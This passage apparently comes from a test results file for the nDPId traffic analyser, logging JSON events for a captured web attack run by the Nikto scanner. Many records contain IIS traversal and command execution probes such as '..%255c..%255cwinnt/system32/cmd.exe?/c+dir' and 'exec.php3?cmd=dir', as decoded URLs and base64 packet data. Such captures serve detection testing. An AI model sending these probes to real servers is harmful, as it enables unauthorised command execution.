-01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277890,"pkt":"AAAAAAAAAAAAAAAACABFAADHrzRAAEAGjPp\/AAABfwAAAcdmH5C4mZZz5s98MYAYAED+uwAAAQEICp1m\/6qdZv+qR0VUIC9pc2FwaS90c3Rpc2FwaS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI2MykNCg0K"} 
-01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277892,"pkt":"AAAAAAAAAAAAAAAACABFAADhOMJAAEAGA1N\/AAABfwAAAcdoH5DDTQGCjXG7iYAYAED+1QAAAQEICp1m\/6ydZv+sR0VUIC9jZXJ0c3J2Ly4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5NCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1576420277893,"pkt":"AAAAAAAAAAAAAAAACABFAADvSZpAAEAG8mx\/AAABfwAAAcdqH5B\/BnDaXNCp24AYAED+4wAAAQEICp1m\/62dZv+tR0VUIC9jZ2ktYmluLy4uJTI1NWMuLiUyNTVjLi4lMjU1Y3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk1KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01108{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277895,"pkt":"AAAAAAAAAAAAAAAACABFAADqfTRAAEAGvtd\/AAABfwAAAcdsH5BhnER0\/MAlIYAYAED+3gAAAQEICp1m\/6+dZv+vR0VUIC9paXNhZG1wd2QvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01103{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":258,"pkt_l4_len":224,"thread_ts_msec":1576420277896,"pkt":"AAAAAAAAAAAAAAAACABFAAD0gMpAAEAGuzd\/AAABfwAAAcduH5Bs5rmLXk\/vk4AYAED+6AAAAQEICp1m\/7CdZv+wR0VUIC9tc2FkYy8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277898,"pkt":"AAAAAAAAAAAAAAAACABFAADwDYtAAEAGLnt\/AAABfwAAAcdwH5DXOjTMIaH3HYAYAED+5AAAAQEICp1m\/7GdZv+xR0VUIC9wYnNlcnZlci8uLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277899,"pkt":"AAAAAAAAAAAAAAAACABFAADkYvBAAEAG2SF\/AAABfwAAAcdyH5AooFut2XrcJYAYAED+2AAAAQEICp1m\/7OdZv+zR0VUIC9ycGMvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01097{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277901,"pkt":"AAAAAAAAAAAAAAAACABFAADogDVAAEAGu9h\/AAABfwAAAcd0H5COI7lxOfsaCoAYAED+3AAAAQEICp1m\/7WdZv+1R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277902,"pkt":"AAAAAAAAAAAAAAAACABFAADos7FAAEAGiFx\/AAABfwAAAcd2H5DBqortDeq7IYAYAED+3AAAAQEICp1m\/7adZv+2R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYyt2ZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277903,"pkt":"AAAAAAAAAAAAAAAACABFAAEFC5dAAEAGMFp\/AAABfwAAAcd4H5DWdjLSA\/QqXoAYAED++QAAAQEICp1m\/7edZv+3R0VUIC9fdnRpX2Jpbi8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzMwMikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 